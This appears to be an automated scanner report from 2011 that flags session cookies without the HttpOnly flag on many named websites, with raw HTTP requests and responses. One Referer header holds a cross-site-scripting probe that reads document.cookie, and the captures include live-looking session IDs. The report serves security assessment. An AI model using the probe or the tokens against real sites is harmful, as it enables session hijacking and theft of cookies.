HTTP/1.1 200 OK Date: Sun, 15 May 2011 13:21:29 GMT Server: Apache-Coyote/1.1 Cache-Control: no-cache, must-revalidate Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1305465689510 Content-Type: text/html;charset=UTF-8 Set-Cookie: JSESSIONID=285F8FE1904E96B3C1F92BE24940B74D; Path=/ Connection: close Vary: Accept-Encoding, User-Agent Content-Length: 33225
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>MyEmail - Logging in and out - Email - MyHelp</title>
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /offers/23073174/start?plid=824141399 HTTP/1.1 Host: onebox.extole.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<html><body>You are being <a href="http://onebox.extole.com/offers/23073174/share?extra_url_query_string=706c69643d383234313431333939">redirected</a>.</body></html>
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /visitor/index.php?/Default/LiveChat/HTML/HTMLButton/cHJvbXB0dHlwZT1jaGF0JnVuaXF1ZWlkPW8yMGg4Z2czcHgmdmVyc2lvbj00LjAxLjg1JnByb2R1Y3Q9RnVzaW9uJmZpbHRlcmRlcGFydG1lbnRpZD0yMSZyb3V0ZWNoYXRza2lsbGlkPTEsMiwzJmN1c3RvbW9ubGluZT0mY3VzdG9tb2ZmbGluZT0mY3VzdG9tYXdheT0mY3VzdG9tYmFja3Nob3J0bHk9CjVmMzE5MDk3ZGE2M2MyZDNlYzM3NmIwZWNlZjMxODc4YTc0MGQ2OTg= HTTP/1.1 Host: support.magneticone.com Proxy-Connection: keep-alive Referer: http://www.oscommerce-manager.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.active24.co.uk Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 13:16:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 15374 Content-Type: text/html Expires: Sun, 15 May 2011 13:15:21 GMT Set-Cookie: UserName=Anonymous; path=/ Set-Cookie: UserId=; path=/ Set-Cookie: ASPSESSIONIDCQBBQBDS=DELLPANDEAJADHIDHBDAOFDP; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <!-- left-nav --> <HEAD> <TITLE>Active 24 : Active 24</TITLE> <!-- Content Management System provided by Synkron A/S | www.sy ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.active24.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Object moved Date: Sun, 15 May 2011 13:16:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: http://www.active24.co.uk Content-Length: 146 Content-Type: text/html Expires: Sun, 15 May 2011 13:15:19 GMT Set-Cookie: UserName=Anonymous; path=/ Set-Cookie: UserId=; path=/ Set-Cookie: ASPSESSIONIDCQBBQBDS=BELLPANDDHAGCFHHPHHGMDEP; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="http://www.active24.co.uk">here</a>.</body>
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bigcommerce-vs-oscommerce.php?ga_campaign=(roi)+competitors&ga_adgroup=oscommerce&ga_keyword=osCommerce&gclid=CMjIyryO6qgCFc065Qod0hgzvA HTTP/1.1 Host: www.bigcommerce.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /businesses/medicineshoppe/ HTTP/1.1 Host: www.cardinal.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 13:18:47 GMT Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix) Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Vary: User-Agent,Cookie Set-Cookie: WCMPRDJSESSIONID=0000wQY9Uai9sD5UK2UPoVRQQAy:15296v7eo; Path=/ Content-Type: text/html Content-Language: en Content-Length: 52776
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><!-- last updated 2010-12-01 14:10 -- ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /default.asp HTTP/1.1 Host: www.cisp.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 301 Moved Permanently Date: Sun, 15 May 2011 13:16:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: http://www.cisp.com Content-Length: 0 Content-Type: text/html Set-Cookie: ASPSESSIONIDQQBSBSTC=IIMJIGEDIFAIFDOMLEJKOKJI; path=/ Cache-control: private
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.cvtelecom.cv Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 13:16:47 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.11 Set-Cookie: SESSd45f694fe0a9cd7f98205f36db4e321c=uu217t5m2qripfeaju7esenpd2; path=/; domain=.cvtelecom.cv Last-Modified: Wed, 11 May 2011 18:24:18 GMT ETag: "2c7249aeff48e50d52e963975adf4829" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25368
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-pt" lang="pt-pt" dir="ltr"> <he ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.grics.qc.ca Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: Keep-Alive Content-Length: 23143 Date: Sun, 15 May 2011 13:16:18 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Set-Cookie: ASP.NET_SessionId=xwe1jw55vxsm4djw4gv1sdim; path=/ Cache-Control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:15:58 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: ASPSESSIONIDQQDRABTC=HDJBGCODNKCBGCKNCEPEIPGB; path=/ Vary: Accept-Encoding Content-Length: 17624
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services.' ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.munichmyway.com Proxy-Connection: keep-alive Referer: http://shops.oscommerce.com/directory/goto,38927 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home HTTP/1.1 Host: www.new.onebox.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=1ontji5p9a1ifvihu5pibr2d55; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /websites/0521accad976e199620f2fe160d311fa HTTP/1.1 Host: www.onbile.com Proxy-Connection: keep-alive Referer: http://finans.turk.net/borsa/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.onebox.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.oscommerce-manager.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=f2ni175et9jr77e2aa6q7luam7; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /magento2/?gclid=CNiAssSO6qgCFUiK4AodyzqKCA HTTP/1.1 Host: www.redstage.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 13:56:41 GMT Server: Apache/2.2.3 (Fedora) X-Powered-By: PHP/5.1.6 Set-Cookie: PHPSESSID=f2ni175et9jr77e2aa6q7luam7; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 16646
<html> <head> <title>Magento, Magento E-Commerce, Magento Developers, Magento Custom Sites | Redstage Netwoks</title> <meta name="description" content="Redstage is a full-service web agency, specializ ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
SESS0684c6974b27be9f5aede608f11c100b=b477739a076f4cf3a3fad936f37a2922; expires=Tue, 07 Jun 2011 17:17:16 GMT; path=/; domain=.servercentral.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.telecom.pt Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Sun, 15 May 2011 13:15:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Location: http://www.telecom.pt/InternetResource/PTSite/PT Set-Cookie: ASP.NET_SessionId=vjl25m550du4vw2pabhtla55; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 165
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href='http://www.telecom.pt/InternetResource/PTSite/PT'>here</a>.</h2> </body></html>
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.teleflora.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /oscommerce-templates.php HTTP/1.1 Host: www.templatemonster.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.turk.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 13:16:24 GMT Server: Microsoft-IIS/6.0 Server_ID: W5 X-Powered-By: ASP.NET Content-Length: 80500 Content-Type: text/html Set-Cookie: ASPSESSIONIDQQQRCCBT=GHHJPNIDFJFGHJLPHHEFPOLI; path=/ Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <META http-equiv="Cont ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /us/en/services/it-services.html HTTP/1.1 Host: www8.hp.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Server: Apache/2.2.3 (Red Hat) Cache-Control: no-cache="set-cookie" Last-Modified: Fri, 13 May 2011 23:45:42 GMT Product: Tridion 2009 Dynamic Content Web Application X-Powered-By: Servlet/2.5 JSP/2.1 Product-Version: 1.4.05, Revision 1348 Content-Type: text/html; charset=UTF-8 Date: Sun, 15 May 2011 13:23:05 GMT Connection: close Vary: Accept-Encoding Set-Cookie: JSESSIONID=mLmRNPTZ21wNFG60nrR6JBqh3vF3fknVyzsdnWrWxQvYP1SJyJZT!946051000; path=/ Content-Length: 141253
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:cwa="http://www.hp.com/cwa" l ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pxoxicm?oxid=55c24d3f-420f-e5d1-3d86-830e190a9e3c HTTP/1.1 Host: a.triggit.com Proxy-Connection: keep-alive Referer: http://www.oscommerce-manager.com/?8b64d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed053e3a864d=1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Set-Cookie: trgu=962ff5fc-04a1-4f8a-bd23-abf5347b50b4; domain=.triggit.com; path=/; expires=Sun, 15-May-2016 00:00:00 GMT; Content-Type: image/gif P3P: CP="DEVo PSDo OUR BUS DSP ALL COR" Date: Sun, 15 May 2011 14:06:34 GMT Content-Length: 43
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/bpix?adv=684&id=1&r= HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1819375;type=telef451;cat=telef469;ord=1;num=3476285561919.2124? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA" Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver Set-Cookie: rsiPus_t9z0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsiPus_t9z0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsiPus_jXrh="MLtXrF9vsF9nIDEzefq6vpEshYFGjdlQKkw4AX9R6TH/LRnRYuvuiWxK5heZbiXhLgjogY3epOerrP4/9PQgCTNzSvrP9Y4WriuhDJ8LUH4CyhiygbkI6Qe46QL3ysOTq8CWCjajF58cLZR38/cuDQBah3RSAXQrcuwCKK48DLMBFdbO9047tQyRaTxgKde4Mm03TcBXyOmbzMtUOO6J1FvDTSjZWhE="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/ Set-Cookie: rsi_us_1000000="pUMdJc+g/xMU1j3Eq6mR0x2J+T7uFxZvzsVdi8NiprYm6J68l6acsXsd9OYJYVlly8cr+J2K6AddxvkNjEpT8X3wbhguSrbE1R5AjsszxQ7b2phQztEEL62sdHARDtFbH3OJm/VPdOINnDb+86Nrzef85GLUTSOmQvDMUO4BgHEgBahj4nShXBrxvzGGSgFxKeOi/wnURRHhCsUk3w6bNETq9ndhTT/TyjyQQV6c1knNyzAR8F0SMmPc7F1XP1SWGwHv4lmVjL6tsMqn9hwdjG2Z2hXONeoPHhNgeyMXMKDvY80hwkmCgrYDzekHPadb5bUcrHvsM5o4WPU2TIAYM6hIuH6jvt4FcFbTkZBk9q7caxcxI2TJpwDYfDKhb2bpjeGdZoqJ64fCKH3HoxZHfHIW3ohUSVLFElW2dzNek4Fn2fadkI5nP/Lat0PGhonkfKaiqyqMWT6PSUH0uHXPvFFCY2Evk4YaLTmYjNE07RfYpxCTaGGg/BdkFC6HM8llsGAFcBnyoJmDj3YaTqrACMoAJTlW5TriVRhc0NWg84j7RXnaqskHltoSyiREwzu6qrMZhfYCTDcN8gjoa9P/CIhtjyJ4oyARPv25F9kJRGwyOgsOqdBmOnVb9IoyXr5WIWzf4q+vmTbO5TCBBuTR1zVApcQcU/o5DdbcpTo7+6xV1qaCy/a9Q9My4u85XsEQQaxzD/ydbuZZkmsuUqZJ7vRCvvf/OQpmY9l9LvHGNlEL1TRNTD4+MDArWjX2PQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/ Content-Type: application/x-javascript;charset=ISO-8859-1 Vary: Accept-Encoding Date: Sun, 15 May 2011 13:19:34 GMT Content-Length: 541
function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;} i.src=u;p[p.length]=i;}} function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /track.fcgi?merchantid=3100817967&eventid=0&ifmode=1 HTTP/1.1 Host: adserver.veruta.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1819375;type=telef451;cat=telef469;ord=1;num=3476285561919.2124? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.